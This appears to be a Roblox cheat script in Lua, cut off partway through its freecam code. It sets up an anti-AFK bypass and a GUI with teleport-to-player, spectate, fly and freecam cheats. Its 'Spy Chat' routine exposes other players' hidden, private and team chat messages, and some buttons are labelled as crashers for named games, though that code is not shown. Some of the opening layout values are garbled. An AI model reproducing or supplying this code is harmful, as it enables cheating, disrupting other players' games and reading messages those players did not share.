wait(0.5)local ba=Instance.new("ScreenGui")
local ca=Instance.new("TextLabel")local da=Instance.new("Frame")
local _b=Instance.new("TextLabel")local ab=Instance.new("TextLabel")ba.Parent=game.CoreGui
ba.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;ca.Parent=ba;ca.Active=true
ca.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ca.Draggable=true
ca.Position=UDim2.new(0894267426272,727425632456,873275673563,62452545)ca.Size=UDim2.new(0,0,0)
ca.Font=Enum.Font.SourceSansSemibold;ca.Text="Anti AFK Script"ca.TextColor3=Color3.new(0,1,1)
ca.TextSize=22;da.Parent=ca
da.BackgroundColor3=Color3.new(0.196078,0.196078,0.196078)da.Position=UDim2.new(999,999,999)
da.Size=UDim2.new(0,370,0,107)_b.Parent=da
_b.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)_b.Position=UDim2.new(999,999,999)
_b.Size=UDim2.new(0,370,0,21)_b.Font=Enum.Font.Arial;_b.Text="made by ur mom "
_b.TextColor3=Color3.new(0,1,1)_b.TextSize=20;ab.Parent=da
ab.BackgroundColor3=Color3.new(0.176471,0.176471,0.176471)ab.Position=UDim2.new(999,999,999)
ab.Size=UDim2.new(0,370,0,44)ab.Font=Enum.Font.ArialBold;ab.Text="Status: Active"
ab.TextColor3=Color3.new(0,1,1)ab.TextSize=20;local bb=game:service'VirtualUser'
game:service'Players'.LocalPlayer.Idled:connect(function()
bb:CaptureController()bb:ClickButton2(Vector2.new())
ab.Text="Roblox tried to kick u but i kicked him instead"wait(2)ab.Text="Status : Active"end)
local ScreenGui = Instance.new("ScreenGui")
local ImageLabel = Instance.new("ImageLabel")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local Frame1 = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local Title = Instance.new("TextLabel")
local Lines = Instance.new("Frame")
local Gui = Instance.new("Frame")
local UICorner_3 = Instance.new("UICorner")
local TargetPage = Instance.new("Frame")
local UICorner_4 = Instance.new("UICorner")
local Target = Instance.new("TextLabel")
local PlayerInfo = Instance.new("TextBox")
local UICorner_5 = Instance.new("UICorner")
local GoTo = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local A_VIEW = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local Main = Instance.new("Frame")
local UICorner_8 = Instance.new("UICorner")
local Main_2 = Instance.new("TextLabel")
local Fly = Instance.new("TextButton")
local UICorner_9 = Instance.new("UICorner")
local LowGfx = Instance.new("TextButton")
local UICorner_10 = Instance.new("UICorner")
local SpyChat = Instance.new("TextButton")
local UICorner_11 = Instance.new("UICorner")
local FreeCam = Instance.new("TextButton")
local UICorner_12 = Instance.new("UICorner")
local AdminBase = Instance.new("TextButton")
local UICorner_13 = Instance.new("UICorner")
local Crashing = Instance.new("Frame")
local UICorner_14 = Instance.new("UICorner")
local Crashing_2 = Instance.new("TextLabel")
local Swagmode = Instance.new("TextButton")
local Swagmode_2 = Instance.new("TextLabel")
local UICorner_15 = Instance.new("UICorner")
local Encrypt = Instance.new("TextButton")
local Encrypt_2 = Instance.new("TextLabel")
local UICorner_16 = Instance.new("UICorner")
local BetterDahood = Instance.new("TextButton")
local BetterDaHood = Instance.new("TextLabel")
local UICorner_17 = Instance.new("UICorner")
local CashCounterPage = Instance.new("Frame")
local UICorner_18 = Instance.new("UICorner")
local BetterDaHood_2 = Instance.new("TextLabel")
local CashCoutner = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

ImageLabel.Parent = ScreenGui
ImageLabel.AnchorPoint = Vector2.new(0.5, 0.5)
ImageLabel.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0, 694, 0, 472)
ImageLabel.Size = UDim2.new(0, 404, 0, 517)
ImageLabel.Image = "rbxassetid://6015897843"
ImageLabel.ImageColor3 = Color3.fromRGB(0, 0, 0)

Frame.Parent = ImageLabel
Frame.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0, 19, 0, 24)
Frame.Size = UDim2.new(0, 366, 0, 469)

UICorner.CornerRadius = UDim.new(0, 3)
UICorner.Parent = Frame

Frame1.Name = "Frame1"
Frame1.Parent = Frame
Frame1.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
Frame1.Position = UDim2.new(0, 6, 0, 6)
Frame1.Size = UDim2.new(0, 354, 0, 457)

UICorner_2.CornerRadius = UDim.new(0, 4)
UICorner_2.Parent = Frame1

Title.Name = "Title"
Title.Parent = Frame1
Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Title.BackgroundTransparency = 1.000
Title.Position = UDim2.new(0, 102, 0, 0)
Title.Size = UDim2.new(0, 150, 0, 31)
Title.Font = Enum.Font.GothamMedium
Title.Text = "Title Please"
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.TextSize = 16.000

Lines.Name = "Lines"
Lines.Parent = Frame1
Lines.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
Lines.BorderSizePixel = 0
Lines.Position = UDim2.new(0, 6, 0, 31)
Lines.Size = UDim2.new(0, 342, 0, 2)

Gui.Name = "Gui"
Gui.Parent = Frame1
Gui.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
Gui.BorderSizePixel = 0
Gui.Position = UDim2.new(0, 6, 0, 40)
Gui.Size = UDim2.new(0, 342, 0, 410)

UICorner_3.CornerRadius = UDim.new(0, 5)
UICorner_3.Parent = Gui

TargetPage.Name = "TargetPage"
TargetPage.Parent = Gui
TargetPage.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
TargetPage.Position = UDim2.new(0, 6, 0, 6)
TargetPage.Size = UDim2.new(0, 167, 0, 107)

UICorner_4.CornerRadius = UDim.new(0, 4)
UICorner_4.Parent = TargetPage

Target.Name = "Target"
Target.Parent = TargetPage
Target.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Target.BackgroundTransparency = 1.000
Target.BorderSizePixel = 0
Target.Size = UDim2.new(0, 48, 0, 20)
Target.Font = Enum.Font.GothamMedium
Target.Text = "Target"
Target.TextColor3 = Color3.fromRGB(255, 255, 255)
Target.TextSize = 14.000

PlayerInfo.Name = "PlayerInfo"
PlayerInfo.Parent = TargetPage
PlayerInfo.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
PlayerInfo.BorderSizePixel = 0
PlayerInfo.Position = UDim2.new(0, 6, 0, 27)
PlayerInfo.Size = UDim2.new(0, 155, 0, 33)
PlayerInfo.Font = Enum.Font.GothamMedium
PlayerInfo.PlaceholderText = "..Player's Name.."
PlayerInfo.Text = ""
PlayerInfo.TextColor3 = Color3.fromRGB(255, 255, 255)
PlayerInfo.TextSize = 14.000

UICorner_5.CornerRadius = UDim.new(0, 4)
UICorner_5.Parent = PlayerInfo

GoTo.Name = "GoTo"
GoTo.Parent = TargetPage
GoTo.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
GoTo.Position = UDim2.new(0, 7, 0, 68)
GoTo.Size = UDim2.new(0, 76, 0, 30)
GoTo.Font = Enum.Font.GothamMedium
GoTo.Text = "Teleport"
GoTo.TextColor3 = Color3.fromRGB(255, 255, 255)
GoTo.TextSize = 15.000

UICorner_6.CornerRadius = UDim.new(0, 4)
UICorner_6.Parent = GoTo

A_VIEW.Name = "A_VIEW"
A_VIEW.Parent = TargetPage
A_VIEW.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
A_VIEW.Position = UDim2.new(0, 85, 0, 68)
A_VIEW.Size = UDim2.new(0, 76, 0, 30)
A_VIEW.Font = Enum.Font.GothamMedium
A_VIEW.Text = "View"
A_VIEW.TextColor3 = Color3.fromRGB(255, 255, 255)
A_VIEW.TextSize = 15.000

UICorner_7.CornerRadius = UDim.new(0, 4)
UICorner_7.Parent = A_VIEW

Main.Name = "Main"
Main.Parent = Gui
Main.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
Main.Position = UDim2.new(0, 179, 0, 6)
Main.Size = UDim2.new(0, 157, 0, 217)

UICorner_8.CornerRadius = UDim.new(0, 4)
UICorner_8.Parent = Main

Main_2.Name = "Main"
Main_2.Parent = Main
Main_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Main_2.BackgroundTransparency = 1.000
Main_2.BorderSizePixel = 0
Main_2.Size = UDim2.new(0, 34, 0, 20)
Main_2.Font = Enum.Font.GothamMedium
Main_2.Text = "Main"
Main_2.TextColor3 = Color3.fromRGB(255, 255, 255)
Main_2.TextSize = 14.000

Fly.Name = "Fly"
Fly.Parent = Main
Fly.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
Fly.Position = UDim2.new(0, 6, 0, 26)
Fly.Size = UDim2.new(0, 145, 0, 31)
Fly.Font = Enum.Font.GothamMedium
Fly.Text = "Fly [X]"
Fly.TextColor3 = Color3.fromRGB(255, 255, 255)
Fly.TextSize = 15.000

UICorner_9.CornerRadius = UDim.new(0, 4)
UICorner_9.Parent = Fly

LowGfx.Name = "LowGfx"
LowGfx.Parent = Main
LowGfx.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
LowGfx.Position = UDim2.new(0, 6, 0, 64)
LowGfx.Size = UDim2.new(0, 145, 0, 31)
LowGfx.Font = Enum.Font.GothamMedium
LowGfx.Text = "Low GFX"
LowGfx.TextColor3 = Color3.fromRGB(255, 255, 255)
LowGfx.TextSize = 15.000

UICorner_10.CornerRadius = UDim.new(0, 4)
UICorner_10.Parent = LowGfx

SpyChat.Name = "SpyChat"
SpyChat.Parent = Main
SpyChat.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
SpyChat.Position = UDim2.new(0, 6, 0, 101)
SpyChat.Size = UDim2.new(0, 145, 0, 31)
SpyChat.Font = Enum.Font.GothamMedium
SpyChat.Text = "Spy Chat"
SpyChat.TextColor3 = Color3.fromRGB(255, 255, 255)
SpyChat.TextSize = 15.000

UICorner_11.CornerRadius = UDim.new(0, 4)
UICorner_11.Parent = SpyChat

FreeCam.Name = "FreeCam"
FreeCam.Parent = Main
FreeCam.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
FreeCam.Position = UDim2.new(0, 6, 0, 138)
FreeCam.Size = UDim2.new(0, 145, 0, 31)
FreeCam.Font = Enum.Font.GothamMedium
FreeCam.Text = "Free Cam [P]"
FreeCam.TextColor3 = Color3.fromRGB(255, 255, 255)
FreeCam.TextSize = 15.000

UICorner_12.CornerRadius = UDim.new(0, 4)
UICorner_12.Parent = FreeCam

AdminBase.Name = "AdminBase"
AdminBase.Parent = Main
AdminBase.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
AdminBase.Position = UDim2.new(0, 6, 0, 175)
AdminBase.Size = UDim2.new(0, 145, 0, 31)
AdminBase.Font = Enum.Font.GothamMedium
AdminBase.Text = "Admin Base"
AdminBase.TextColor3 = Color3.fromRGB(255, 255, 255)
AdminBase.TextSize = 15.000

UICorner_13.CornerRadius = UDim.new(0, 4)
UICorner_13.Parent = AdminBase

Crashing.Name = "Crashing"
Crashing.Parent = Gui
Crashing.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
Crashing.Position = UDim2.new(0, 6, 0, 119)
Crashing.Size = UDim2.new(0, 167, 0, 205)

UICorner_14.CornerRadius = UDim.new(0, 4)
UICorner_14.Parent = Crashing

Crashing_2.Name = "Crashing"
Crashing_2.Parent = Crashing
Crashing_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Crashing_2.BackgroundTransparency = 1.000
Crashing_2.BorderSizePixel = 0
Crashing_2.Size = UDim2.new(0, 42, 0, 20)
Crashing_2.Font = Enum.Font.GothamMedium
Crashing_2.Text = "Crash"
Crashing_2.TextColor3 = Color3.fromRGB(255, 255, 255)
Crashing_2.TextSize = 14.000

Swagmode.Name = "Swagmode"
Swagmode.Parent = Crashing
Swagmode.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
Swagmode.Position = UDim2.new(0, 6, 0, 48)
Swagmode.Size = UDim2.new(0, 154, 0, 32)
Swagmode.Font = Enum.Font.GothamMedium
Swagmode.Text = "Swagmode Crasher"
Swagmode.TextColor3 = Color3.fromRGB(255, 255, 255)
Swagmode.TextSize = 15.000
Swagmode.TextWrapped = true

Swagmode_2.Name = "Swagmode"
Swagmode_2.Parent = Swagmode
Swagmode_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Swagmode_2.BackgroundTransparency = 1.000
Swagmode_2.Position = UDim2.new(0, 0, 0, -21)
Swagmode_2.Size = UDim2.new(0, 77, 0, 21)
Swagmode_2.Font = Enum.Font.GothamMedium
Swagmode_2.Text = "Swagmode"
Swagmode_2.TextColor3 = Color3.fromRGB(255, 255, 255)
Swagmode_2.TextSize = 14.000
Swagmode_2.TextXAlignment = Enum.TextXAlignment.Left

UICorner_15.CornerRadius = UDim.new(0, 4)
UICorner_15.Parent = Swagmode

Encrypt.Name = "Encrypt"
Encrypt.Parent = Crashing
Encrypt.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
Encrypt.Position = UDim2.new(0, 6, 0, 105)
Encrypt.Size = UDim2.new(0, 154, 0, 32)
Encrypt.Font = Enum.Font.GothamMedium
Encrypt.Text = "Encrypt Crasher"
Encrypt.TextColor3 = Color3.fromRGB(255, 255, 255)
Encrypt.TextSize = 15.000
Encrypt.TextWrapped = true

Encrypt_2.Name = "Encrypt"
Encrypt_2.Parent = Encrypt
Encrypt_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Encrypt_2.BackgroundTransparency = 1.000
Encrypt_2.Position = UDim2.new(0, 0, 0, -21)
Encrypt_2.Size = UDim2.new(0, 77, 0, 21)
Encrypt_2.Font = Enum.Font.GothamMedium
Encrypt_2.Text = "Encrypt"
Encrypt_2.TextColor3 = Color3.fromRGB(255, 255, 255)
Encrypt_2.TextSize = 14.000
Encrypt_2.TextXAlignment = Enum.TextXAlignment.Left

UICorner_16.CornerRadius = UDim.new(0, 4)
UICorner_16.Parent = Encrypt

BetterDahood.Name = "BetterDahood"
BetterDahood.Parent = Crashing
BetterDahood.BackgroundColor3 = Color3.fromRGB(63, 63, 63)
BetterDahood.Position = UDim2.new(0, 6, 0, 163)
BetterDahood.Size = UDim2.new(0, 154, 0, 32)
BetterDahood.Font = Enum.Font.GothamMedium
BetterDahood.Text = "BetterDaHood Crasher"
BetterDahood.TextColor3 = Color3.fromRGB(255, 255, 255)
BetterDahood.TextSize = 15.000
BetterDahood.TextWrapped = true

BetterDaHood.Name = "BetterDaHood"
BetterDaHood.Parent = BetterDahood
BetterDaHood.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
BetterDaHood.BackgroundTransparency = 1.000
BetterDaHood.Position = UDim2.new(0, 0, 0, -21)
BetterDaHood.Size = UDim2.new(0, 97, 0, 21)
BetterDaHood.Font = Enum.Font.GothamMedium
BetterDaHood.Text = "BetterDaHood"
BetterDaHood.TextColor3 = Color3.fromRGB(255, 255, 255)
BetterDaHood.TextSize = 14.000
BetterDaHood.TextXAlignment = Enum.TextXAlignment.Left

UICorner_17.CornerRadius = UDim.new(0, 4)
UICorner_17.Parent = BetterDahood

CashCounterPage.Name = "CashCounterPage"
CashCounterPage.Parent = Gui
CashCounterPage.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
CashCounterPage.Position = UDim2.new(0, 179, 0, 230)
CashCounterPage.Size = UDim2.new(0, 157, 0, 52)

UICorner_18.CornerRadius = UDim.new(0, 4)
UICorner_18.Parent = CashCounterPage

BetterDaHood_2.Name = "BetterDaHood"
BetterDaHood_2.Parent = CashCounterPage
BetterDaHood_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
BetterDaHood_2.BackgroundTransparency = 1.000
BetterDaHood_2.Position = UDim2.new(0, 30, 0, 0)
BetterDaHood_2.Size = UDim2.new(0, 97, 0, 21)
BetterDaHood_2.Font = Enum.Font.GothamMedium
BetterDaHood_2.Text = "Cash Counter"
BetterDaHood_2.TextColor3 = Color3.fromRGB(255, 255, 255)
BetterDaHood_2.TextSize = 14.000
BetterDaHood_2.TextXAlignment = Enum.TextXAlignment.Left

CashCoutner.Name = "CashCoutner"
CashCoutner.Parent = CashCounterPage
CashCoutner.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CashCoutner.BackgroundTransparency = 1.000
CashCoutner.Position = UDim2.new(0, 0, 0, 21)
CashCoutner.Size = UDim2.new(0, 157, 0, 31)
CashCoutner.Font = Enum.Font.GothamMedium
CashCoutner.Text = "$100,000,000"
CashCoutner.TextColor3 = Color3.fromRGB(255, 255, 255)
CashCoutner.TextSize = 15.000

-- Scripts:

local function JQJPN_fake_script() -- PlayerInfo.LocalScript 
	local script = Instance.new('LocalScript', PlayerInfo)

	script.Parent.FocusLost:connect(function()
		for i,v in pairs(game.Players:GetChildren()) do
			if (string.sub(string.lower(v.Name),1,string.len(PlayerInfo.Text))) == string.lower(PlayerInfo.Text) then
				PlayerInfo.Text = v.Name
			end
		end
	end)	
end
coroutine.wrap(JQJPN_fake_script)()
local function BLVYFZ_fake_script() -- GoTo.LocalScript 
	local script = Instance.new('LocalScript', GoTo)

	script.Parent.MouseButton1Down:Connect(function()
		game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players[PlayerInfo.Text].Character.UpperTorso.Position)
	end)
end
coroutine.wrap(BLVYFZ_fake_script)()
local function DQNUWDM_fake_script() -- A_VIEW.LocalScript 
	local script = Instance.new('LocalScript', A_VIEW)

	script.Parent.MouseButton1Down:Connect(function()
		script.Parent.MouseButton1Click:connect(function()
			if A_VIEW.Text == 'VIEW' then
				A_VIEW.Text = 'UNVIEW'
				repeat view(PlayerInfo.Text) until A_VIEW.Text == 'VIEW'
				game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA('Humanoid')
			else
				A_VIEW.Text = 'VIEW'
			end
		end)
		function view(plr)
			wait()
			if game.Players:FindFirstChild(plr) then
				if game.Players[plr].Character then
					game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = game.Players:FindFirstChild(plr).Character.HumanoidRootPart
				else
					A_VIEW.Text = 'VIEW'
				end
			else
				A_VIEW.Text = 'VIEW'
			end
		end
	end)
end
coroutine.wrap(DQNUWDM_fake_script)()
local function CQKXFTQ_fake_script() -- Fly.LocalScript 
	local script = Instance.new('LocalScript', Fly)

	script.Parent.MouseButton1Down:Connect(function()
		local plr = game.Players.LocalPlayer
		local mouse = plr:GetMouse()
	
		localplayer = plr
	
		if workspace:FindFirstChild("Core") then
			workspace.Core:Destroy()
		end
	
		local Core = Instance.new("Part")
		Core.Name = "Core"
		Core.Size = Vector3.new(0.05, 0.05, 0.05)
	
		spawn(function()
			Core.Parent = workspace
			local Weld = Instance.new("Weld", Core)
			Weld.Part0 = Core
			Weld.Part1 = localplayer.Character.LowerTorso
			Weld.C0 = CFrame.new(0, 0, 0)
		end)
	
		workspace:WaitForChild("Core")
	
		local torso = workspace.Core
		flying = true
		local speed=10
		local keys={a=false,d=false,w=false,s=false}
		local e1
		local e2
		local function start()
			local pos = Instance.new("BodyPosition",torso)
			local gyro = Instance.new("BodyGyro",torso)
			pos.Name="EPIXPOS"
			pos.maxForce = Vector3.new(math.huge, math.huge, math.huge)
			pos.position = torso.Position
			gyro.maxTorque = Vector3.new(9e9, 9e9, 9e9)
			gyro.cframe = torso.CFrame
			repeat
				wait()
				localplayer.Character.Humanoid.PlatformStand=true
				local new=gyro.cframe - gyro.cframe.p + pos.position
				if not keys.w and not keys.s and not keys.a and not keys.d then
					speed=5
				end
				if keys.w then
					new = new + workspace.CurrentCamera.CoordinateFrame.lookVector * speed
					speed=speed+0
				end
				if keys.s then
					new = new - workspace.CurrentCamera.CoordinateFrame.lookVector * speed
					speed=speed+0
				end
				if keys.d then
					new = new * CFrame.new(speed,0,0)
					speed=speed+0
				end
				if keys.a then
					new = new * CFrame.new(-speed,0,0)
					speed=speed+0
				end
				if speed>10 then
					speed=5
				end
				pos.position=new.p
				if keys.w then
					gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(-math.rad(speed*0),0,0)
				elseif keys.s then
					gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(math.rad(speed*0),0,0)
				else
					gyro.cframe = workspace.CurrentCamera.CoordinateFrame
				end
			until flying == false
			if gyro then gyro:Destroy() end
			if pos then pos:Destroy() end
			flying=false
			localplayer.Character.Humanoid.PlatformStand=false
			speed=10
		end
		e1=mouse.KeyDown:connect(function(key)
			if not torso or not torso.Parent then flying=false e1:disconnect() e2:disconnect() return end
			if key=="w" then
				keys.w=true
			elseif key=="s" then
				keys.s=true
			elseif key=="a" then
				keys.a=true
			elseif key=="d" then
				keys.d=true
			elseif key=="x" then
				if flying==true then
					flying=false
				else
					flying=true
					start()
				end
			end
		end)
		e2=mouse.KeyUp:connect(function(key)
			if key=="w" then
				keys.w=false
			elseif key=="s" then
				keys.s=false
			elseif key=="a" then
				keys.a=false
			elseif key=="d" then
				keys.d=false
			end
		end)
		start()
	end)
end
coroutine.wrap(CQKXFTQ_fake_script)()
local function FJOB_fake_script() -- LowGfx.LocalScript 
	local script = Instance.new('LocalScript', LowGfx)

	script.Parent.MouseButton1Down:Connect(function()
		local decalsyeeted = true -- Leaving this on makes games look shitty but the fps goes up by at least 20.
		local g = game
		local w = g.Workspace
		local l = g.Lighting
		local t = w.Terrain
		t.WaterWaveSize = 0
		t.WaterWaveSpeed = 0
		t.WaterReflectance = 0
		t.WaterTransparency = 0
		l.GlobalShadows = false
		l.FogEnd = 9e9
		l.Brightness = 0
		settings().Rendering.QualityLevel = "Level01"
		for i, v in pairs(g:GetDescendants()) do
			if v:IsA("Part") or v:IsA("Union") or v:IsA("CornerWedgePart") or v:IsA("TrussPart") then
				v.Material = "Plastic"
				v.Reflectance = 0
			elseif v:IsA("Decal") or v:IsA("Texture") and decalsyeeted then
				v.Transparency = 1
			elseif v:IsA("ParticleEmitter") or v:IsA("Trail") then
				v.Lifetime = NumberRange.new(0)
			elseif v:IsA("Explosion") then
				v.BlastPressure = 1
				v.BlastRadius = 1
			elseif v:IsA("Fire") or v:IsA("SpotLight") or v:IsA("Smoke") then
				v.Enabled = false
			elseif v:IsA("MeshPart") then
				v.Material = "Plastic"
				v.Reflectance = 0
				v.TextureID = 10385902758728957
			end
		end
		for i, e in pairs(l:GetChildren()) do
			if e:IsA("BlurEffect") or e:IsA("SunRaysEffect") or e:IsA("ColorCorrectionEffect") or e:IsA("BloomEffect") or e:IsA("DepthOfFieldEffect") then
				e.Enabled = false
			end
		end
	end)
end
coroutine.wrap(FJOB_fake_script)()
local function LARVIGL_fake_script() -- SpyChat.LocalScript 
	local script = Instance.new('LocalScript', SpyChat)

	script.Parent.MouseButton1Down:Connect(function()
		--This script reveals ALL hidden messages in the default chat
		--chat "/MagmaHacks" to toggle!
		enabled = true
		--if true will check your messages too
		spyOnMyself = false
		--if true will chat the logs publicly (fun, risky)
		public = false
		--if true will use /me to stand out
		publicItalics = true
		--customize private logs
		privateProperties = {
			Color = Color3.fromRGB(0,255,255); 
			Font = Enum.Font.SourceSansBold;
			TextSize = 18;
		}
		--////////////////////////////////////////////////////////////////
		local StarterGui = game:GetService("StarterGui")
		local Players = game:GetService("Players")
		local player = Players.LocalPlayer or Players:GetPropertyChangedSignal("LocalPlayer"):Wait() or Players.LocalPlayer
		local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest")
		local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering")
		local instance = (_G.chatSpyInstance or 0) + 1
		_G.chatSpyInstance = instance
	
		local function onChatted(p,msg)
			if _G.chatSpyInstance == instance then
				if p==player and msg:lower():sub(1,4)=="/MagmaHacks" then
					enabled = not enabled
					wait(0.3)
					privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
					StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
				elseif enabled and (spyOnMyself==true or p~=player) then
					msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ')
					local hidden = true
					local conn = getmsg.OnClientEvent:Connect(function(packet,channel)
						if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and Players[packet.FromSpeaker].Team==player.Team)) then
							hidden = false
						end
					end)
					wait(1)
					conn:Disconnect()
					if hidden and enabled then
						if public then
							saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All")
						else
							privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg
							StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
						end
					end
				end
			end
		end
	
		for _,p in ipairs(Players:GetPlayers()) do
			p.Chatted:Connect(function(msg) onChatted(p,msg) end)
		end
		Players.PlayerAdded:Connect(function(p)
			p.Chatted:Connect(function(msg) onChatted(p,msg) end)
		end)
		privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
		StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
		if not player.PlayerGui:FindFirstChild("Chat") then wait(3) end
		local chatFrame = player.PlayerGui.Chat.Frame
		chatFrame.ChatChannelParentFrame.Visible = true
		chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y)
	end)
end
coroutine.wrap(LARVIGL_fake_script)()
local function UFDYOAH_fake_script() -- FreeCam.LocalScript 
	local script = Instance.new('LocalScript', FreeCam)

	script.Parent.MouseButton1Down:Connect(function()
		function sandbox(var,func)
			local env = getfenv(func)
			local newenv = setmetatable({},{
				__index = function(self,k)
					if k=="script" then
						return var
					else
						return env[k]
					end
				end,
			})
			setfenv(func,newenv)
			return func
		end
		cors = {}
		mas = Instance.new("Model",game:GetService("Lighting"))
		LocalScript0 = Instance.new("LocalScript")
		LocalScript0.Name = "FreeCamera"
		LocalScript0.Parent = mas
		table.insert(cors,sandbox(LocalScript0,function()
			-----------------------------------------------------------------------
			-- Freecam
			-- Cinematic free camera for spectating and video production.
			------------------------------------------------------------------------
	
			local pi    = math.pi
			local abs   = math.abs
			local clamp = math.clamp
			local exp   = math.exp
			local rad   = math.rad
			local sign  = math.sign
			local sqrt  = math.sqrt
			local tan   = math.tan
	
			local ContextActionService = game:GetService("ContextActionService")
			local Players = game:GetService("Players")
			local RunService = game:GetService("RunService")
			local StarterGui = game:GetService("StarterGui")
			local UserInputService = game:GetService("UserInputService")
	
			local LocalPlayer = Players.LocalPlayer
			if not LocalPlayer then
				Players:GetPropertyChangedSignal("LocalPlayer"):Wait()
				LocalPlayer = Players.LocalPlayer
			end
	
			local Camera = workspace.CurrentCamera
			workspace:GetPropertyChangedSignal("CurrentCamera"):Connect(function()
				local newCamera = workspace.CurrentCamera
				if newCamera then
					Camera = newCamera
				end
			end)
	
			------------------------------------------------------------------------
	
			local TOGGLE_INPUT_PRIORITY = Enum.ContextActionPriority.Low.Value
			local INPUT_PRIORITY = Enum.ContextActionPriority.High.Value
			local FREECAM_MACRO_KB = {Enum.KeyCode.P}
	
			local NAV_GAIN = Vector3.new(1, 1, 1)*64
			local PAN_GAIN = Vector2.new(0.75, 1)*8
			local FOV_GAIN = 300
	
			local PITCH_LIMIT = rad(90)
	
			local VEL_STIFFNESS = 1.5
			local PAN_STIFFNESS = 1.0
			local FOV_STIFFNESS = 4.0
	
			------------------------------------------------------------------------
	
			local Spring = {} do
				Spring.__index = Spring
	
				function Spring.new(freq, pos)
					local self = setmetatable({}, Spring)
					self.f = freq
					self.p = pos
					self.v = pos*0
					return self
				end
	
				function Spring:Update(dt, goal)
					local f = self.f*2*pi
					local p0 = self.p
					local v0 = self.v
	
					local offset = goal - p0
					local decay = exp(-f*dt)
	
					local p1 = goal + (v0*dt - offset*(f*dt + 1))*decay
					local v1 = (f*dt*(offset*f - v0) + v0)*decay
	
					self.p = p1
					self.v = v1
	
					return p1
				end
	
				function Spring:Reset(pos)
					self.p = pos
					self.v = pos*0
				end
			end
	
			------------------------------------------------------------------------
	
			local cameraPos = Vector3.new()
			local cameraRot = Vector2.new()
			local cameraFov = 0
	
			local velSpring = Spring.new(VEL_STIFFNESS, Vector3.new())
			local panSpring = Spring.new(PAN_STIFFNESS, Vector2.new())
			local fovSpring = Spring.new(FOV_STIFFNESS, 0)
	
			------------------------------------------------------------------------
	
			local Input = {} do
				local thumbstickCurve do
					local K_CURVATURE = 2.0
					local K_DEADZONE = 0.15
	
					local function fCurve(x)
						return (exp(K_CURVATURE*x) - 1)/(exp(K_CURVATURE) - 1)
					end
	
					local function fDeadzone(x)
						return fCurve((x - K_DEADZONE)/(1 - K_DEADZONE))
					end
	
					function thumbstickCurve(x)
						return sign(x)*clamp(fDeadzone(abs(x)), 0, 1)
					end
				end
	
				local gamepad = {
					ButtonX = 0,
					ButtonY = 0,
					DPadDown = 0,
					DPadUp = 0,
					ButtonL2 = 0,
					ButtonR2 = 0,
					Thumbstick1 = Vector2.new(),
					Thumbstick2 = Vector2.new(),
				}
	
				local keyboard = {
					W = 0,
					A = 0,
					S = 0,
					D = 0,
					E = 0,
					Q = 0,
					U = 0,
					H = 0,
					J = 0,
					K = 0,
					I = 0,
					Y = 0,
					Up = 0,
					Down = 0,
					LeftShift = 0,
					RightShift = 0,
				}
	
				local mouse = {
					Delta = Vector2.new(),
					MouseWheel = 0,
				}
	
